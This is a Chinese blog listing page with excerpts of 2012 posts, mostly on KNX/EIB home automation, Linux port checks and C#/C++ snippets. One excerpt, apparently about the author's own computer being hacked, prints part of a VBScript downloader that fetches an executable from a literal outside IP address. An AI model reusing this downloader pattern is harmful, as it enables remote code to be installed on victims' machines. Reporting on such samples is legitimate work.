自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(20)
  • 资源 (1)
  • 收藏
  • 关注

原创 linux 下查看进程被占用情况

使用 netstat   -anp   |   grep  portno    即:netstat –apn | grep 8080    linux下查看端口占用情况:    1.查看哪个进程占用了819端口:    case9-sghfofo:/usr/local/cnbj/tomcat-bj/bin # lsof -i:859    运行后的结果:    COMM

2012-10-31 17:40:52 890

原创 C++ 类型转C#类型

C++ 类型转C#类型Win32 Types                                                          CLR Type  char, INT8, SBYTE, CHAR                                    System.SByte short, short int, INT1

2012-10-30 16:47:05 423

原创 C#获得本机IP和Mac

用C#获得本机IP和Macusing System;using System.Collections.Generic;using System.Text;using System.Net;using System.Management;namespace exp_01_1021{    class Program    {        static voi

2012-10-30 11:36:47 552

转载 KNX (standard)

KNX (standard)From Wikipedia, the free encyclopediaJump to: navigation, searchKNX is a standardized (EN 50090,ISO/IEC 14543), OSI-based network communications protocol for

2012-10-30 11:28:09 2392

转载 Interacting with Linknx

Applications or user-interfcaes who want to communicate with Linknx can do this using the XML protocol defined hereunder.Linknx support communication using a TCP connection or UNIX domain socket. Th

2012-10-29 15:00:52 522

原创 c 函数作形参 的例子, C#调用

/* Type for main function. */typedef int (*pj_main_func_ptr)(int argc, char *argv[]);作为形参数int pj_run_app(pj_main_func_ptr main_func, int argc, char *argv[],      unsigned flags);

2012-10-25 22:51:15 596

转载 Linknx users

Links to web pages of some linknx users:http://www.duse.de/online/start.php?filename=Visualisierung WebKNXhttp://www.haeussler.name/blogs/hobby/2008/08/28/visualisierung-mit-php/http://w

2012-10-20 16:40:11 595

转载 Accessing the KNX bus

There are several ways to connect EIBD to the KNX bus. Here's the list coming from the EIBD homepage :FT1.2 / BCU 2PEI16 / BCU 1 (using the BCU 1 kernel driver or an experimental user mode dri

2012-10-20 16:34:24 807

转载 EIB/KNX with eibd

from :http://wiki.linuxmce.org/index.php/EIB/KNX_with_eibd#Use_EIBd EIB/KNX with eibdFrom LinuxMCE wikiJump to: navigation, searchVersionStatusDate UpdatedUpdated By

2012-10-19 12:00:45 950

原创 黑客是如何黑我的电脑的

Set psp = CreateObject("Msxml2.XMLHTTP") set ws=WScript.CreateObject("WScript.Shell") psp.Open "GET","http://27.151.180.228:108/1234.exe",0 psp.Send() Set aGet = CreateObject("ADODB.Stream")

2012-10-17 21:19:12 1088

转载 Log for C++

Log for C++IntroductionLog4cpp is library of C++ classes for flexible logging to files, syslog, IDSA and other destinations. It is modeled after theLog4j Java library, staying as close to thei

2012-10-17 11:44:02 1472

转载 Install Eibd/Linknx/knxweb

Install Eibd/Linknx/knxwebHow to Install (configure and make) EIBD, Linknx and Knxweb on Linux Debian without paquageIn this page the command "sudo" is format have the right of root if your

2012-10-17 10:18:03 6646

转载 EIBD installation and usage

EIBD installation and usage Home Automation Add commentsAug 032012 As already mentioned in our previous post  introduction to EIB/KNX, the physical connectivity to the bus can be don

2012-10-17 10:04:16 2254

原创 knx project site

http://knxathome.fh-deggendorf.dehttp://calimero.sourceforge.net/http://blog-en.openalfa.com/eibd-installation-and-usage/http://www.bb-steuerungstechnik.de/cms/eib-diagnosetools.html?&L=1h

2012-10-16 10:04:22 753

原创 knx protocol 解析

Protocol Data Unit (PDU)协议数据体Message Code (MC)消息代码Common External Message Interface (cEMI).通用外部消息接口 Data Point Type (DPT)数据点类型Connection Response Data (CRD)连接回复数据Connection Request

2012-10-13 22:50:51 2955

原创 Open Project site 开源项目网站

github.comwww.codeplex.comwww.sourceforge.netwww.codeproject.comhttp://code.google.comhttp://www.dehof.de/eib/

2012-10-12 21:03:27 418

原创 Java Enum 实现

public final class Priority{/*** System priority, reserved for high priority management and system configuration.* */public static final Priority SYSTEM = new Priority(0x00);/*** U

2012-10-11 14:12:19 366

转载 Get ComboBox Item Index From Mouse Point

// Import the GetScrollInfo function from user32.dll[DllImport("user32.dll", SetLastError = true)]private static extern int GetScrollInfo(IntPtr hWnd, int n, ref ScrollInf

2012-10-10 10:38:04 584

转载 List of KNX Open Source or free software

http://calimero.sourceforge.net/Software nameDescription and FunctionsCalaos (http://www.calaos.fr)A French open source home automation cliente/Server package, with a focus on to

2012-10-09 22:10:31 5436

转载 KNX Linux USB Driver

/* * A low-level driver for EIB/Konnex bus access through USB * * (c) 2005  Heinz W. Werntges and Vladimir Vinarski * * $Id: knx_usb_driver.c,v 1.3 2005/10/29 22:43:47 werntges Exp $ * *

2012-10-09 22:02:56 1468 1

linux tftp server

linux tftp server [root]# tar vxfz tftp-hpa-0.48.tar.gz [root]# cd tftp-hpa-0.48 [root]# make [root]# make install

2012-10-31

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除